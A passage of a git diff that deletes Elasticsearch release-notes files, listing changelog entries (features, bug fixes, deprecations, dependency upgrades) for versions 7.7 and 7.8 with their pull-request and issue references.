using latest bucket timestamps {es-pull}51061[#51061] -* Use largest ordered subset of categorization tokens for category reverse -search regex {ml-pull}970[#970] (issue: {ml-issue}949[#949]) -* Account for the data frame's memory when estimating the peak memory used by -classification and regression model training {ml-pull}996[#996] -* Rename classification and regression parameter maximum_number_trees to -max_trees {ml-pull}1047[#1047] - -Mapping:: -* Throw better exception on wrong `dynamic_templates` syntax {es-pull}51783[#51783] (issue: {es-issue}51486[#51486]) - -Network:: -* Add support for more named curves {es-pull}55179[#55179] (issue: {es-issue}55031[#55031]) -* Allow proxy mode server name to be updated {es-pull}54107[#54107] -* Invoke response handler on failure to send {es-pull}53631[#53631] -* Do not log no-op reconnections at DEBUG {es-pull}53469[#53469] -* Fix RemoteConnectionManager size() method {es-pull}52823[#52823] (issue: {es-issue}52029[#52029]) -* Remove seeds dependency for remote cluster settings {es-pull}52796[#52796] -* Add host address to BindTransportException message {es-pull}51269[#51269] (issue: {es-issue}48001[#48001]) - -Percolator:: -* Test percolate queries using `NOW` and sorting {es-pull}52758[#52758] (issues: {es-issue}52618[#52618], {es-issue}52748[#52748]) -* Don't index ranges including `NOW` in percolator {es-pull}52748[#52748] (issue: {es-issue}52617[#52617]) - -Reindex:: -* Negative TimeValue fix {es-pull}54057[#54057] (issue: {es-issue}53913[#53913]) -* Allow comma separated source indices {es-pull}52044[#52044] (issue: {es-issue}51949[#51949]) - -SQL:: -* Fix ODBC metadata for DATE & TIME data types {es-pull}55316[#55316] (issue: {es-issue}41086[#41086]) -* Fix NPE for parameterized LIKE/RLIKE {es-pull}53573[#53573] (issue: {es-issue}53557[#53557]) -* Add support for index aliases for SYS COLUMNS command {es-pull}53525[#53525] (issue: {es-issue}31609[#31609]) -* Fix issue with LIKE/RLIKE as painless script {es-pull}53495[#53495] (issue: {es-issue}53486[#53486]) -* Fix column size for IP data type {es-pull}53056[#53056] (issue: {es-issue}52762[#52762]) -* Fix sql cli sourcing of x-pack-env {es-pull}52613[#52613] (issue: {es-issue}47803[#47803]) -* Supplement input checks on received request parameters {es-pull}52229[#52229] -* Fix issue with timezone when paginating {es-pull}52101[#52101] (issue: {es-issue}51258[#51258]) -* Fix ORDER BY on aggregates and GROUPed BY fields {es-pull}51894[#51894] (issue: {es-issue}50355[#50355]) -* Fix milliseconds handling in intervals {es-pull}51675[#51675] (issue: {es-issue}41635[#41635]) -* Fix ORDER BY YEAR() function {es-pull}51562[#51562] (issue: {es-issue}51224[#51224]) -* Change the way unsupported data types fields are handled {es-pull}50823[#50823] -* Selecting a literal from grouped by query generates error {es-pull}41964[#41964] (issues: {es-issue}41413[#41413], {es-issue}41951[#41951]) - -Search:: -* Improve robustness of Query Result serializations {es-pull}54692[#54692] (issue: {es-issue}54665[#54665]) -* Fix Term Vectors with artificial docs and keyword fields {es-pull}53504[#53504] (issue: {es-issue}53494[#53494]) -* Fix concurrent requests race over scroll context limit {es-pull}53449[#53449] -* Fix pre-sorting of shards in the can_match phase {es-pull}53397[#53397] -* Fix potential NPE in FuzzyTermsEnum {es-pull}53231[#53231] (issue: {es-issue}52894[#52894]) -* Fix inaccurate total hit count in _search/template api {es-pull}53155[#53155] (issue: {es-issue}52801[#52801]) -* Harden search 
context id {es-pull}53143[#53143] -* Correct boost in `script_score` query and error on negative scores {es-pull}52478[#52478] (issue: {es-issue}48465[#48465]) - -Snapshot/Restore:: -* Exclude Snapshot Shard Status Update Requests from Circuit Breaker {es-pull}55376[#55376] (issue: {es-issue}54714[#54714]) -* Fix Snapshot Completion Listener Lost on Master Failover {es-pull}54286[#54286] -* Fix Non-Verbose Snapshot List Missing Empty Snapshots {es-pull}52433[#52433] -* Fix Inconsistent Shard Failure Count in Failed Snapshots {es-pull}51416[#51416] (issue: {es-issue}47550[#47550]) -* Fix Overly Aggressive Request DeDuplication {es-pull}51270[#51270] (issue: {es-issue}51253[#51253]) - -Store:: -* Fix synchronization in ByteSizeCachingDirectory {es-pull}52512[#52512] - -Transform:: -* Fixing naming in HLRC and _cat to match API content {es-pull}54300[#54300] (issue: {es-issue}53946[#53946]) -* Transform optmize date histogram {es-pull}54068[#54068] (issue: {es-issue}54254[#54254]) -* Add version guards around Transform hidden index settings {es-pull}54036[#54036] (issue: {es-issue}53931[#53931]) -* Fix NPE in derive stats if shouldStopAtNextCheckpoint is set {es-pull}52940[#52940] -* Fix mapping deduction for scaled_float {es-pull}51990[#51990] (issue: {es-issue}51780[#51780]) -* Fix stats can return old state information if security is enabled {es-pull}51732[#51732] (issue: {es-issue}51728[#51728]) - - - -[[upgrade-7.7.0]] -[discrete] -=== Upgrades - -Authentication:: -* Update oauth2-oidc-sdk to 7.0 {es-pull}52489[#52489] (issue: {es-issue}48409[#48409]) - -Engine:: -* Upgrade to lucene 8.5.0 release {es-pull}54077[#54077] -* Upgrade to final lucene 8.5.0 snapshot {es-pull}53293[#53293] -* Upgrade to Lucene 8.5.0-snapshot-c4475920b08 {es-pull}52950[#52950] - -Features/Ingest:: -* Upgrade Tika to 1.24 {es-pull}54130[#54130] (issue: {es-issue}52402[#52402]) - -Infra/Core:: -* Upgrade the bundled JDK to JDK 14 {es-pull}53748[#53748] (issue: {es-issue}53575[#53575]) -* Upgrade to Jackson 2.10.3 {es-pull}53523[#53523] (issues: {es-issue}27032[#27032], {es-issue}45225[#45225]) -* Update jackson-databind to 2.8.11.6 {es-pull}53522[#53522] (issue: {es-issue}45225[#45225]) - -Infra/Packaging:: -* Upgrade the bundled JDK to JDK 13.0.2 {es-pull}51511[#51511] - -Security:: -* Update BouncyCastle to 1.64 {es-pull}52185[#52185] - -Snapshot/Restore:: -* Upgrade GCS Dependency to 1.106.0 {es-pull}54092[#54092] -* Upgrade to AWS SDK 1.11.749 {es-pull}53962[#53962] (issue: {es-issue}53191[#53191]) -* Upgrade to Azure SDK 8.6.2 {es-pull}53865[#53865] -* Upgrade GCS SDK to 1.104.0 {es-pull}52839[#52839] diff --git a/docs/reference/release-notes/7.8.asciidoc b/docs/reference/release-notes/7.8.asciidoc deleted file mode 100644 index 71e15b86368..00000000000 --- a/docs/reference/release-notes/7.8.asciidoc +++ /dev/null @@ -1,499 +0,0 @@ -[[release-notes-7.8.1]] -== {es} version 7.8.1 - -Also see <>. - -[[known-issues-7.8.1]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. 
- -[[breaking-7.8.1]] -[discrete] -=== Breaking changes - -License:: -* Display enterprise license as platinum in /_xpack {es-pull}58217[#58217] - - - -[[feature-7.8.1]] -[discrete] -=== New features - -SQL:: -* Implement SUM, MIN, MAX, AVG over literals {es-pull}56786[#56786] (issues: {es-issue}41412[#41412], {es-issue}55569[#55569]) - - - -[[enhancement-7.8.1]] -[discrete] -=== Enhancements - -Authorization:: -* Add read privileges for observability-annotations for apm_user {es-pull}58530[#58530] (issues: {es-issue}64796[#64796], {es-issue}69642[#69642], {es-issue}69881[#69881]) - -Features/Indices APIs:: -* Change "apply create index" log level to DEBUG {es-pull}56947[#56947] -* Make noop template updates be cluster state noops {es-pull}57851[#57851] (issue: {es-issue}57662[#57662]) -* Rename template V2 classes to ComposableTemplate {es-pull}57183[#57183] (issue: {es-issue}56609[#56609]) - -Machine Learning:: -* Add exponent output aggregator to inference {es-pull}58933[#58933] - -Snapshot/Restore:: -* Allow read operations to be executed without waiting for full range to be written in cache {es-pull}58728[#58728] (issues: {es-issue}58164[#58164], {es-issue}58477[#58477]) -* Allows SparseFileTracker to progressively execute listeners during Gap processing {es-pull}58477[#58477] (issue: {es-issue}58164[#58164]) -* Do not wrap CacheFile reentrant r/w locks with ReleasableLock {es-pull}58244[#58244] (issue: {es-issue}58164[#58164]) -* Use snapshot information to build searchable snapshot store MetadataSnapshot {es-pull}56289[#56289] - -Transform:: -* Improve update API {es-pull}57648[#57648] (issue: {es-issue}56499[#56499]) - - - -[[bug-7.8.1]] -[discrete] -=== Bug fixes - -CCR:: -* Ensure CCR partial reads never overuse buffer {es-pull}58620[#58620] - -Cluster Coordination:: -* Suppress cluster UUID logs in 6.8/7.x upgrade {es-pull}56835[#56835] -* Timeout health API on busy master {es-pull}57587[#57587] - -Engine:: -* Fix realtime get of numeric fields from translog {es-pull}58121[#58121] (issue: {es-issue}57462[#57462]) - -Features/ILM+SLM:: -* Fix negative limiting with fewer PARTIAL snapshots than minimum required {es-pull}58563[#58563] (issue: {es-issue}58515[#58515]) - -Features/Indices APIs:: -* Fix issue reading template mappings after cluster restart {es-pull}58964[#58964] (issues: {es-issue}58521[#58521], {es-issue}58643[#58643], {es-issue}58883[#58883]) -* ITV2: disallow duplicate dynamic templates {es-pull}56291[#56291] (issues: {es-issue}28988[#28988], {es-issue}53101[#53101], {es-issue}53326[#53326]) - - -Features/Stats:: -* Fix unnecessary stats warning when swap is disabled {es-pull}57983[#57983] - -Geo:: -* Fix max-int limit for number of points reduced in geo_centroid {es-pull}56370[#56370] (issue: {es-issue}55992[#55992]) -* Re-enable support for array-valued geo_shape fields. 
{es-pull}58786[#58786] - -Infra/Core:: -* Week based parsing for ingest date processor {es-pull}58597[#58597] (issue: {es-issue}58479[#58479]) - -Machine Learning:: -* Allow unran/incomplete forecasts to be deleted for stopped/failed jobs {es-pull}57152[#57152] (issue: {es-issue}56419[#56419]) -* Fix inference .ml-stats-write alias creation {es-pull}58947[#58947] (issue: {es-issue}58662[#58662]) -* Fix race condition when force stopping data frame analytics job {es-pull}57680[#57680] -* Handle broken setup with state alias being an index {es-pull}58999[#58999] (issue: {es-issue}58482[#58482]) -* Mark forecasts for force closed/failed jobs as failed {es-pull}57143[#57143] (issue: {es-issue}56419[#56419]) -* Better interrupt handling during named pipe connection {ml-pull}1311[#1311] -* Trap potential cause of SIGFPE {ml-pull}1351[#1351] (issue: {ml-issue}1348[#1348]) -* Correct inference model definition for MSLE regression models {ml-pull}1375[#1375] -* Fix cause of SIGSEGV of classification and regression {ml-pull}1379[#1379] -* Fix restoration of change detectors after seasonality change {ml-pull}1391[#1391] -* Fix potential SIGSEGV when forecasting {ml-pull}1402[#1402] (issue: {ml-issue}1401[#1401]) - -Network:: -* Close channel on handshake error with old version {es-pull}56989[#56989] (issue: {es-issue}54337[#54337]) - -Percolator:: -* Fix nested document support in percolator query {es-pull}58149[#58149] (issue: {es-issue}52850[#52850]) - -Recovery:: -* Fix recovery stage transition with sync_id {es-pull}57754[#57754] (issues: {es-issue}57187[#57187], {es-issue}57708[#57708]) - -SQL:: -* Fix behaviour of COUNT(DISTINCT ) {es-pull}56869[#56869] -* Fix bug in resolving aliases against filters {es-pull}58399[#58399] (issues: {es-issue}57270[#57270], {es-issue}57417[#57417]) -* Fix handling of escaped chars in JDBC connection string {es-pull}58429[#58429] (issue: {es-issue}57927[#57927]) -* Handle MIN and MAX functions on dates in Painless scripts {es-pull}57605[#57605] (issue: {es-issue}57581[#57581]) - -Search:: -* Ensure search contexts are removed on index delete {es-pull}56335[#56335] -* Filter empty fields in SearchHit#toXContent {es-pull}58418[#58418] (issue: {es-issue}41656[#41656]) -* Fix exists query on unmapped field in query_string {es-pull}58804[#58804] (issues: {es-issue}55785[#55785], {es-issue}58737[#58737]) -* Fix handling of terminate_after when size is 0 {es-pull}58212[#58212] (issue: {es-issue}57624[#57624]) -* Fix possible NPE on search phase failure {es-pull}57952[#57952] (issues: {es-issue}51708[#51708], {es-issue}57945[#57945]) -* Handle failures with no explicit cause in async search {es-pull}58319[#58319] (issues: {es-issue}57925[#57925], {es-issue}58311[#58311]) -* Improve error handling in async search code {es-pull}57925[#57925] (issue: {es-issue}58995[#58995]) -* Prevent BigInteger serialization errors in term queries {es-pull}57987[#57987] (issue: {es-issue}57917[#57917]) -* Submit async search to not require read privilege {es-pull}58942[#58942] - -Snapshot/Restore:: -* Fix Incorrect Snapshot Shar Status for DONE Shards in Running Snapshots {es-pull}58390[#58390] -* Fix Memory Leak From Master Failover During Snapshot {es-pull}58511[#58511] (issue: {es-issue}56911[#56911]) -* Fix NPE in SnapshotService CS Application {es-pull}58680[#58680] -* Fix Snapshot Abort Not Waiting for Data Nodes {es-pull}58214[#58214] -* Remove Overly Strict Safety Mechnism in Shard Snapshot Logic {es-pull}57227[#57227] (issue: {es-issue}57198[#57198]) - -Task Management:: -* 
Cancel persistent task recheck when no longer master {es-pull}58539[#58539] (issue: {es-issue}58531[#58531]) -* Ensure unregister child node if failed to register task {es-pull}56254[#56254] (issues: {es-issue}54312[#54312], {es-issue}55875[#55875]) - -Transform:: -* Fix page size return in cat transform, add dps {es-pull}57871[#57871] (issues: {es-issue}56007[#56007], {es-issue}56498[#56498]) - - - -[[upgrade-7.8.1]] -[discrete] -=== Upgrades - -Infra/Core:: -* Upgrade to JNA 5.5.0 {es-pull}58183[#58183] - - -[[release-notes-7.8.0]] -== {es} version 7.8.0 - -Also see <>. - -[[known-issues-7.8.0]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -[[breaking-7.8.0]] -[discrete] -=== Breaking changes - -Aggregations:: -* `value_count` aggregation optimization {es-pull}54854[#54854] - -Features/Indices APIs:: -* Add auto create action {es-pull}55858[#55858] - -Mapping:: -* Disallow changing 'enabled' on the root mapper {es-pull}54463[#54463] (issue: {es-issue}33933[#33933]) -* Fix updating include_in_parent/include_in_root of nested field {es-pull}54386[#54386] (issue: {es-issue}53792[#53792]) - - -[[deprecation-7.8.0]] -[discrete] -=== Deprecations - -Authentication:: -* Deprecate the `kibana` reserved user; introduce `kibana_system` user {es-pull}54967[#54967] - -Cluster Coordination:: -* Voting config exclusions should work with absent nodes {es-pull}50836[#50836] (issue: {es-issue}47990[#47990]) - -Features/Features:: -* Add node local storage deprecation check {es-pull}54383[#54383] (issue: {es-issue}54374[#54374]) - -Features/Indices APIs:: -* Deprecate local parameter for get field mapping request {es-pull}55014[#55014] - -Infra/Core:: -* Deprecate node local storage setting {es-pull}54374[#54374] - -Infra/Plugins:: -* Add xpack setting deprecations to deprecation API {es-pull}56290[#56290] (issue: {es-issue}54745[#54745]) -* Deprecate disabling basic-license features {es-pull}54816[#54816] (issue: {es-issue}54745[#54745]) -* Deprecated xpack "enable" settings should be no-ops {es-pull}55416[#55416] (issues: {es-issue}54745[#54745], {es-issue}54816[#54816]) -* Make xpack.ilm.enabled setting a no-op {es-pull}55592[#55592] (issues: {es-issue}54745[#54745], {es-issue}54816[#54816], {es-issue}55416[#55416]) -* Make xpack.monitoring.enabled setting a no-op {es-pull}55617[#55617] (issues: {es-issue}54745[#54745], {es-issue}54816[#54816], {es-issue}55416[#55416], {es-issue}55461[#55461], {es-issue}55592[#55592]) -* Restore xpack.ilm.enabled and xpack.slm.enabled settings {es-pull}57383[#57383] (issues: {es-issue}54745[#54745], {es-issue}55416[#55416], {es-issue}55592[#55592]) - - - -[[feature-7.8.0]] -[discrete] -=== New features - -Aggregations:: -* Add Student's t-test aggregation support {es-pull}54469[#54469] (issue: {es-issue}53692[#53692]) -* Add support for filters to t-test aggregation {es-pull}54980[#54980] (issue: {es-issue}53692[#53692]) -* Histogram field type support for Sum aggregation {es-pull}55681[#55681] (issue: {es-issue}53285[#53285]) -* Histogram field type support for ValueCount and Avg aggregations {es-pull}55933[#55933] (issue: 
{es-issue}53285[#53285]) - -Features/Indices APIs:: -* Add simulate template composition API _index_template/_simulate_index/{name} {es-pull}55686[#55686] (issue: {es-issue}53101[#53101]) - -Geo:: -* Add geo_bounds aggregation support for geo_shape {es-pull}55328[#55328] -* Add geo_shape support for geotile_grid and geohash_grid {es-pull}55966[#55966] -* Add geo_shape support for the geo_centroid aggregation {es-pull}55602[#55602] -* Add new point field {es-pull}53804[#53804] - -SQL:: -* Implement DATETIME_FORMAT function for date/time formatting {es-pull}54832[#54832] (issue: {es-issue}53714[#53714]) -* Implement DATETIME_PARSE function for parsing strings {es-pull}54960[#54960] (issue: {es-issue}53714[#53714]) -* Implement scripting inside aggs {es-pull}55241[#55241] (issues: {es-issue}29980[#29980], {es-issue}36865[#36865], {es-issue}37271[#37271]) - - - -[[enhancement-7.8.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Aggs must specify a `field` or `script` (or both) {es-pull}52226[#52226] -* Expose aggregation usage in Feature Usage API {es-pull}55732[#55732] (issue: {es-issue}53746[#53746]) -* Reduce memory for big aggregations run against many shards {es-pull}54758[#54758] -* Save memory in on aggs in async search {es-pull}55683[#55683] - -Allocation:: -* Disk decider respect watermarks for single data node {es-pull}55805[#55805] -* Improve same-shard allocation explanations {es-pull}56010[#56010] - -Analysis:: -* Add preserve_original setting in ngram token filter {es-pull}55432[#55432] -* Add preserve_original setting in edge ngram token filter {es-pull}55766[#55766] (issue: {es-issue}55767[#55767]) -* Add pre-configured “lowercase” normalizer {es-pull}53882[#53882] (issue: {es-issue}53872[#53872]) - -Audit:: -* Update the audit logfile list of system users {es-pull}55578[#55578] (issue: {es-issue}37924[#37924]) - -Authentication:: -* Let realms gracefully terminate the authN chain {es-pull}55623[#55623] - -Authorization:: -* Add reserved_ml_user and reserved_ml_admin kibana privileges {es-pull}54713[#54713] - -Autoscaling:: -* Rollover: refactor out cluster state update {es-pull}53965[#53965] - -CRUD:: -* Avoid holding onto bulk items until all completed {es-pull}54407[#54407] - -Cluster Coordination:: -* Add voting config exclusion add and clear API spec and integration test cases {es-pull}55760[#55760] (issue: {es-issue}48131[#48131]) - -Features/CAT APIs:: -* Add support for V2 index templates to /_cat/templates {es-pull}55829[#55829] (issue: {es-issue}53101[#53101]) - -Features/Indices APIs:: -* Add HLRC support for simulate index template api {es-pull}55936[#55936] (issue: {es-issue}53101[#53101]) -* Add prefer_v2_templates flag and index setting {es-pull}55411[#55411] (issue: {es-issue}53101[#53101]) -* Add warnings/errors when V2 templates would match same indices as V1 {es-pull}54367[#54367] (issue: {es-issue}53101[#53101]) -* Disallow merging existing mapping field definitions in templates {es-pull}57701[#57701] (issues: {es-issue}55607[#55607], {es-issue}55982[#55982], {es-issue}57393[#57393]) -* Emit deprecation warning if multiple v1 templates match with a new index {es-pull}55558[#55558] (issue: {es-issue}53101[#53101]) -* Guard adding the index.prefer_v2_templates settings for pre-7.8 nodes {es-pull}55546[#55546] (issues: {es-issue}53101[#53101], {es-issue}55411[#55411], {es-issue}55539[#55539]) -* Handle merging dotted object names when merging V2 template mappings {es-pull}55982[#55982] (issue: {es-issue}53101[#53101]) -* Throw exception on duplicate 
mappings metadata fields when merging templates {es-pull}57835[#57835] (issue: {es-issue}57701[#57701]) -* Update template v2 api rest spec {es-pull}55948[#55948] (issue: {es-issue}53101[#53101]) -* Use V2 index templates during index creation {es-pull}54669[#54669] (issue: {es-issue}53101[#53101]) -* Use V2 templates when reading duplicate aliases and ingest pipelines {es-pull}54902[#54902] (issue: {es-issue}53101[#53101]) -* Validate V2 templates more strictly {es-pull}56170[#56170] (issues: {es-issue}43737[#43737], {es-issue}46045[#46045], {es-issue}53101[#53101], {es-issue}53970[#53970]) - -Features/Java High Level REST Client:: -* Enable support for decompression of compressed response within RestHighLevelClient {es-pull}53533[#53533] - -Features/Stats:: -* Fix available / total disk cluster stats {es-pull}32480[#32480] (issue: {es-issue}32478[#32478]) - -Features/Watcher:: -* Delay warning about missing x-pack {es-pull}54265[#54265] (issue: {es-issue}40898[#40898]) - -Geo:: -* Add geo_shape mapper supporting doc-values in Spatial Plugin {es-pull}55037[#55037] (issue: {es-issue}53562[#53562]) - -Infra/Core:: -* Decouple Environment from DiscoveryNode {es-pull}54373[#54373] -* Ensure that the output of node roles are sorted {es-pull}54376[#54376] (issue: {es-issue}54370[#54370]) -* Reintroduce system index APIs for Kibana {es-pull}54858[#54858] (issues: {es-issue}52385[#52385], {es-issue}53912[#53912]) -* Schedule commands in current thread context {es-pull}54187[#54187] (issue: {es-issue}17143[#17143]) -* Start resource watcher service early {es-pull}54993[#54993] (issue: {es-issue}54867[#54867]) - -Infra/Packaging:: -* Make Windows JAVA_HOME handling consistent with Linux {es-pull}55261[#55261] (issue: {es-issue}55134[#55134]) - - -Infra/REST API:: -* Add validation to the usage service {es-pull}54617[#54617] - -Infra/Scripting:: -* Scripting: stats per context in nodes stats {es-pull}54008[#54008] (issue: {es-issue}50152[#50152]) - -Machine Learning:: -* Add effective max model memory limit to ML info {es-pull}55529[#55529] (issue: {es-issue}63942[#63942]) -* Add loss_function to regression {es-pull}56118[#56118] -* Add new inference_config field to trained model config {es-pull}54421[#54421] -* Add failed_category_count to model_size_stats {es-pull}55716[#55716] (issue: {es-issue}1130[#1130]) -* Add prediction_field_type to inference config {es-pull}55128[#55128] -* Allow a certain number of ill-formatted rows when delimited format is specified {es-pull}55735[#55735] (issue: {es-issue}38890[#38890]) -* Apply default timeout in StopDataFrameAnalyticsAction.Request {es-pull}55512[#55512] -* Create an annotation when a model snapshot is stored {es-pull}53783[#53783] (issue: {es-issue}52149[#52149]) -* Do not execute ML CRUD actions when upgrade mode is enabled {es-pull}54437[#54437] (issue: {es-issue}54326[#54326]) -* Make find_file_structure recognize Kibana CSV report timestamps {es-pull}55609[#55609] (issue: {es-issue}55586[#55586]) -* More advanced model snapshot retention options {es-pull}56125[#56125] (issue: {es-issue}52150[#52150]) -* Return assigned node in start/open job/datafeed response {es-pull}55473[#55473] (issue: {es-issue}54067[#54067]) -* Skip daily maintenance activity if upgrade mode is enabled {es-pull}54565[#54565] (issue: {es-issue}54326[#54326]) -* Start gathering and storing inference stats {es-pull}53429[#53429] -* Unassign data frame analytics tasks in SetUpgradeModeAction {es-pull}54523[#54523] (issue: {es-issue}54326[#54326]) -* Speed up anomaly detection 
for the lat_long function {ml-pull}1102[#1102] -* Reduce CPU scheduling priority of native analysis processes to favor the ES -JVM when CPU is constrained. This change is implemented only for Linux and macOS, -not for Windows {ml-pull}1109[#1109] -* Take `training_percent` into account when estimating memory usage for -classification and regression {ml-pull}1111[#1111] -* Support maximize minimum recall when assigning class labels for multiclass -classification {ml-pull}1113[#1113] -* Improve robustness of anomaly detection to bad input data {ml-pull}1114[#1114] -* Add new `num_matches` and `preferred_to_categories` fields to category output -{ml-pull}1062[#1062] -* Add mean squared logarithmic error (MSLE) for regression {ml-pull}1101[#1101] -* Add pseudo-Huber loss for regression {ml-pull}1168[#1168] -* Reduce peak memory usage and memory estimates for classification and regression -{ml-pull}1125[#1125].) -* Reduce variability of classification and regression results across our target -operating systems {ml-pull}1127[#1127] -* Switch data frame analytics model memory estimates from kilobytes to -megabytes {ml-pull}1126[#1126] (issue: {es-issue}54506[#54506]) -* Add a {ml} native code build for Linux on AArch64 {ml-pull}1132[#1132], -{ml-pull}1135[#1135] -* Improve data frame analytics runtime by optimising memory alignment for intrinsic -operations {ml-pull}1142[#1142] -* Fix spurious anomalies for count and sum functions after no data are received -for long periods of time {ml-pull}1158[#1158] -* Improve false positive rates from periodicity test for time series anomaly -detection {ml-pull}1177[#1177] -* Break progress reporting of data frame analyses into multiple phases {ml-pull}1179[#1179] -* Really centre the data before training for classification and regression begins. 
This -means we can choose more optimal smoothing bias and should reduce the number of trees -{ml-pull}1192[#1192] - -Mapping:: -* Merge V2 index/component template mappings in specific manner {es-pull}55607[#55607] (issue: {es-issue}53101[#53101]) - -Recovery:: -* Avoid copying file chunks in peer covery {es-pull}56072[#56072] (issue: {es-issue}55353[#55353]) -* Retry failed peer recovery due to transient errors {es-pull}55353[#55353] - -SQL:: -* Add BigDecimal support to JDBC {es-pull}56015[#56015] (issue: {es-issue}43806[#43806]) -* Drop BASE TABLE type in favour for just TABLE {es-pull}54836[#54836] -* Relax version lock between server and clients {es-pull}56148[#56148] - -Search:: -* Consolidate DelayableWriteable {es-pull}55932[#55932] -* Exists queries to MatchNoneQueryBuilder when the field is unmapped {es-pull}54857[#54857] -* Rewrite wrapper queries to match_none if possible {es-pull}55271[#55271] -* SearchService#canMatch takes into consideration the alias filter {es-pull}55120[#55120] (issue: {es-issue}55090[#55090]) - -Snapshot/Restore:: -* Add GCS support for searchable snapshots {es-pull}55403[#55403] -* Allocate searchable snapshots with the balancer {es-pull}54889[#54889] (issues: {es-issue}50999[#50999], {es-issue}54729[#54729]) -* Allow bulk snapshot deletes to abort {es-pull}56009[#56009] (issue: {es-issue}55773[#55773]) -* Allow deleting multiple snapshots at once {es-pull}55474[#55474] -* Allow searching of snapshot taken while indexing {es-pull}55511[#55511] (issue: {es-issue}50999[#50999]) -* Allow to prewarm the cache for searchable snapshot shards {es-pull}55322[#55322] -* Enable prewarming by default for searchable snapshots {es-pull}56201[#56201] (issue: {es-issue}55952[#55952]) -* Permit searches to be concurrent to prewarming {es-pull}55795[#55795] -* Reduce contention in CacheFile.fileLock() method {es-pull}55662[#55662] -* Require soft deletes for searchable snapshots {es-pull}55453[#55453] -* Searchable Snapshots should respect max_restore_bytes_per_sec {es-pull}55952[#55952] -* Update the HDFS version used by HDFS Repo {es-pull}53693[#53693] -* Use streaming reads for GCS {es-pull}55506[#55506] (issue: {es-issue}55505[#55505]) -* Use workers to warm cache parts {es-pull}55793[#55793] (issue: {es-issue}55322[#55322]) - -Task Management:: -* Add indexName in update-settings task name {es-pull}55714[#55714] -* Add scroll info to search task description {es-pull}54606[#54606] -* Broadcast cancellation to only nodes have outstanding child tasks {es-pull}54312[#54312] (issues: {es-issue}50990[#50990], {es-issue}51157[#51157]) -* Support hierarchical task cancellation {es-pull}54757[#54757] (issue: {es-issue}50990[#50990]) - -Transform:: -* Add throttling {es-pull}56007[#56007] (issue: {es-issue}54862[#54862]) - - - -[[bug-7.8.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Add analytics plugin usage stats to _xpack/usage {es-pull}54911[#54911] (issue: {es-issue}54847[#54847]) -* Aggregation support for Value Scripts that change types {es-pull}54830[#54830] (issue: {es-issue}54655[#54655]) -* Allow terms agg to default to depth first {es-pull}54845[#54845] -* Clean up how pipeline aggs check for multi-bucket {es-pull}54161[#54161] (issue: {es-issue}53215[#53215]) -* Fix auto_date_histogram serialization bug {es-pull}54447[#54447] (issues: {es-issue}54382[#54382], {es-issue}54429[#54429]) -* Fix error massage for unknown value type {es-pull}55821[#55821] (issue: {es-issue}55727[#55727]) -* Fix scripted metric in CCS {es-pull}54776[#54776] (issue: 
{es-issue}54758[#54758]) -* Use Decimal formatter for Numeric ValuesSourceTypes {es-pull}54366[#54366] (issue: {es-issue}54365[#54365]) - -Allocation:: -* Fix Broken ExistingStoreRecoverySource Deserialization {es-pull}55657[#55657] (issue: {es-issue}55513[#55513]) - - -Features/ILM+SLM:: -* ILM stop step execution if writeIndex is false {es-pull}54805[#54805] - -Features/Indices APIs:: -* Fix NPE in MetadataIndexTemplateService#findV2Template {es-pull}54945[#54945] -* Fix creating filtered alias using now in a date_nanos range query failed {es-pull}54785[#54785] (issue: {es-issue}54315[#54315]) -* Fix simulating index templates without specified index {es-pull}56295[#56295] (issues: {es-issue}53101[#53101], {es-issue}56255[#56255]) -* Validate non-negative priorities for V2 index templates {es-pull}56139[#56139] (issue: {es-issue}53101[#53101]) - -Features/Watcher:: -* Ensure watcher email action message ids are always unique {es-pull}56574[#56574] - -Infra/Core:: -* Add generic Set support to streams {es-pull}54769[#54769] (issue: {es-issue}54708[#54708]) - -Machine Learning:: -* Fix GET _ml/inference so size param is respected {es-pull}57303[#57303] (issue: {es-issue}57298[#57298]) -* Fix file structure finder multiline merge max for delimited formats {es-pull}56023[#56023] -* Validate at least one feature is available for DF analytics {es-pull}55876[#55876] (issue: {es-issue}55593[#55593]) -* Trap and fail if insufficient features are supplied to data frame analyses. -Otherwise, classification and regression got stuck at zero analyzing progress -{ml-pull}1160[#1160] (issue: {es-issue}55593[#55593]) -* Make categorization respect the model_memory_limit {ml-pull}1167[#1167] -(issue: {ml-issue}1130[#1130]) -* Respect user overrides for max_trees for classification and regression -{ml-pull}1185[#1185] -* Reset memory status from soft_limit to ok when pruning is no longer required -{ml-pull}1193[#1193] (issue: {ml-issue}1131[#1131]) -* Fix restore from training state for classification and regression -{ml-pull}1197[#1197] -* Improve the initialization of seasonal components for anomaly detection -{ml-pull}1201[#1201] (issue: {ml-issue}#1178[#1178]) - -Network:: -* Fix issue with pipeline releasing bytes early {es-pull}54458[#54458] -* Handle TLS file updates during startup {es-pull}54999[#54999] (issue: {es-issue}54867[#54867]) - -SQL:: -* Fix DATETIME_PARSE behaviour regarding timezones {es-pull}56158[#56158] (issue: {es-issue}54960[#54960]) - -Search:: -* Don't expand default_field in query_string before required {es-pull}55158[#55158] (issue: {es-issue}53789[#53789]) -* Fix `time_zone` for `query_string` and date fields {es-pull}55881[#55881] (issue: {es-issue}55813[#55813]) - -Security:: -* Fix certutil http for empty password with JDK 11 and lower {es-pull}55437[#55437] (issue: {es-issue}55386[#55386]) - -Transform:: -* Fix count when matching exact ids {es-pull}56544[#56544] (issue: {es-issue}56196[#56196]) -* Fix http status code when bad scripts are provided {es-pull}56117[#56117] (issue: {es-issue}55994[#55994]) - - - -[[regression-7.8.0]] -[discrete] -=== Regressions - -Infra/Scripting:: -* Don't double-wrap expression values {es-pull}54432[#54432] (issue: {es-issue}53661[#53661]) - diff --git a/docs/reference/release-notes/7.9.asciidoc b/docs/reference/release-notes/7.9.asciidoc deleted file mode 100644 index 